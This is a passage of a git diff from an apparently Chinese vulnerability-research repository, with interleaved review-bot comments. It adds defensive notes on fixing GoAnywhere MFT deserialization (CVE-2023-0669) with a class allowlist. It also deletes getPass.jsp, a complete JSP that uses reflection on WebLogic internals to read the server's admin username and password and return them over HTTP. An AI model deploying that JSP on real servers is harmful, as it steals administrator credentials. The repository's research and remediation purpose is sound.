password); -> }catch (Exception e) { -> e.printStackTrace(); -> } -> %> -> ``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144720974-59cb9fd5-65df-4dae-a9f8-fd103719f499.png) - diff --git a/vulnerability-analysis/weblogic/getPass.jsp b/vulnerability-analysis/weblogic/getPass.jsp deleted file mode 100644 index 591193bf..00000000 --- a/vulnerability-analysis/weblogic/getPass.jsp +++ /dev/null @@ -1,30 +0,0 @@ -<%@page import="java.lang.reflect.Field" %> -<%@page import="java.lang.reflect.Method" %> - -<% - /** - * 已测试: - * 10.3.6.0 - */ - try{ - ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); - Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"); - Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService"); - Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject"); - Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService"); - Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID"); - KERNE_ID.setAccessible(true); - Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject); - getPropertyService.setAccessible(true); - Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null)); - Method getTimestamp1 = propertyService.getMethod("getTimestamp1"); - getTimestamp1.setAccessible(true); - Method getTimestamp2 = propertyService.getMethod("getTimestamp2"); - getTimestamp2.setAccessible(true); - String username = (String) getTimestamp1.invoke(prop); - String password = (String) getTimestamp2.invoke(prop); - response.getWriter().write( username + "/" + password); - }catch (Exception e) { - e.printStackTrace(); - } -%> \ No newline at end of file 
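Review bot: the deletions in this region (vulnerability-analysis/log4j2/README.md, vulnerability-analysis/resin/README.md, vulnerability-analysis/weblogic/README.md and vulnerability-analysis/weblogic/getPass.jsp) have no matching additions anywhere in the diff, unlike the ofcms assets earlier in the patch, which git detected as 100% renames. If the material was relocated elsewhere in the repository, move it with `git mv` (or commit the new files in the same change) so the rename is detected and history follows the content; if it was intentionally dropped, say so in the commit message, because the image references embedded in those files are the only record of the analysis.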
diff --git "a/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" "b/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" new file mode 100644 index 00000000..0b024f36 --- /dev/null +++ "b/344円277円256円345円244円215円346円226円271円346円241円210円/README.md" @@ -0,0 +1 @@ +> 记录漏洞复现过程中遇到的各种漏洞的修复方案 diff --git "a/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" "b/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" new file mode 100644 index 00000000..58602bab --- /dev/null +++ "b/344円277円256円345円244円215円346円226円271円346円241円210円/345円217円215円345円272円217円345円210円227円345円214円226円/readObject.md" 
@@ -0,0 +1,50 @@ + +### 01 ValidatingObjectInputStream(commons-io.jar) + +commons-io.jar 的 ValidatingObjectInputStream 类提供了 accept/reject 方法来控制允许反序列化/不允许反序列化的类, 以达到黑/白名单的效果。 + + +案例: GoAnywhere MFT (CVE-2023-0669) + +修复前 +```java +private static byte[] verify(byte[] paramArrayOfByte, KeyConfig paramKeyConfig) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException { + objectInputStream = null; + try { + String str = "SHA1withDSA"; + if ("2".equals(paramKeyConfig.getVersion())) { + str = "SHA512withRSA"; + } + PublicKey publicKey = getPublicKey(paramKeyConfig); + objectInputStream = new ObjectInputStream(new ByteArrayInputStream(paramArrayOfByte)); + SignedObject signedObject = (SignedObject)objectInputStream.readObject(); +``` + +修复后 +```java +private static byte[] verify(byte[] var0, KeyConfig var1) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException { + // 只允许反序列化的类为 SignedObject、[B + ObjectInputStream var2 = getSecureObjectInputStream(var0, SignedObject.class, byte[].class); + + byte[] var9; + try { + String var3 = "SHA1withDSA"; + if ("2".equals(var1.getVersion())) { + var3 = "SHA512withRSA"; + } + + PublicKey var4 = getPublicKey(var1); + SignedObject var5 = (SignedObject)var2.readObject(); +``` + +修复方案 + +```java + private static ObjectInputStream getSecureObjectInputStream(byte[] var0, Class... var1) throws IOException { + ValidatingObjectInputStream var2 = new ValidatingObjectInputStream(new ByteArrayInputStream(var0)); + var2.accept(var1); + return var2; + } +``` + +通过 ValidatingObjectInputStream 设置白名单,只允许反序列化的类为 `SignedObject` 和 `[B`,SignedObject虽然重写了 readObect(), 但是没发现有啥可以进一步绕过的地方。
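Review bot: the closing paragraph of readObject.md has a typo, `readObect()` for `readObject()`, and the reason the fix works is left implicit: in the 修复前 snippet, `objectInputStream.readObject()` resolves and instantiates whatever class the caller-supplied bytes name before `verify` ever checks the signature, so the signature cannot protect the deserialization step; stating that makes clear that the allowlist, not the signature, is the control being added. For readers who cannot pull in commons-io it is worth noting that the JDK ships the same mechanism since JEP 290 (Java 9, backported to 8u121): `ObjectInputStream.setObjectInputFilter(ObjectInputFilter.Config.createFilter("java.security.SignedObject;!*"))`, which also accepts `maxdepth=` and `maxarray=` limits that `ValidatingObjectInputStream` does not provide (primitive arrays such as `byte[]` are matched by component type and left undecided by the pattern filter, so `[B` need not be listed). Also, the 修复前 snippet opens with `objectInputStream = null;` and no declaration, which is decompiler output; either add the `ObjectInputStream` type or label the snippet as decompiled so it is not mistaken for compilable source.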
